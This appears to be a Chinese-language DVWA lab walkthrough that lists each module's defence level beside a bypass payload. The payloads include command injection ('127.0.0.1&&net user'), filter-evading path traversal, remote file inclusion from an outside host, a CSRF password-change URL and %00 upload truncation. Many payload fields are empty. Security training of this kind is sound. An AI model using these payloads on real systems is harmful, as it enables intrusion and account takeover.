防御:无
Payload:
防御:黑名单
Payload:
双写绕过
<sc
大小写混淆绕过
防御:黑名单,正则
Payload:
黑名单绕过
防御:HTML 实体
Payload:无
同反射型XSS
防御:无
Payload:
联合查询
防御:转义
Payload:
是数字型,所以同上
防御:转义 + LIMIT 1
Payload:
是数字型,所以同上,用#注释LIMIT 1
防御:PDO
Payload:
无
思想和SQL Injection一样
防御:无
Payload:
1.burp 爆破
2.sql注入
防御:防止了sql注入
Payload:
burp 爆破
防御:Token
Payload:
python脚本
or
burp https://blog.csdn.net/Z_Grant/article/details/100177201
防御:错误次数限制 ,PDO
Payload:无
Command Injection
防御:无
Payload:
127.0.0.1&&net user
防御:ban ”&&” 、”;”
Payload:
127.0.0.1&net user
防御:进一步完善了黑名单
Payload:
127.0.0.1|net user
防御:is_numeric(string)
检测string是否为数字或数字字符串,如果是返回TRUE,否则返回FALSE。
Payload:无
防御:无
Payload:
dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
防御:REFERER头
Payload:
burp改
防御:token
Payload:
XSS + CSRF
防御:要求用户输入原始密码(狠)
Payload:
无
防御:无
Payload:
更改step参数
防御:passed_captcha参数检查
Payload:
更改step参数,增加passed_captcha参数
防御:验证$resp
Payload:
更改参数recaptcha_response_field以及http包头的User-Agent
防御:增加了Anti-CSRF token 验证码无法绕过 要求用户输入之前的密码
Payload:无
File Upload
防御:无
Payload:
懂得都懂
防御:上传文件的类型、大小做了限制
Payload:
抓包修改文件类型
or
00阶段
防御:白名单
Payload:
%00截断
防御:对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则)
Payload:
无
防御:无
Payload:
\dvwa\php.ini
防御:增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除
Payload:
/dvwa/vulnerabilities/fi/page=..././..././..././..././..././..././..././..././..././..././xampp/htdocs/dvwa/php.ini
dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt(远程文件包含)
防御:规定只能包含file开头的文件
Payload:
dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
防御:白名单机制
Payload:无
原文:https://www.cnblogs.com/kwjqsj/p/13679543.html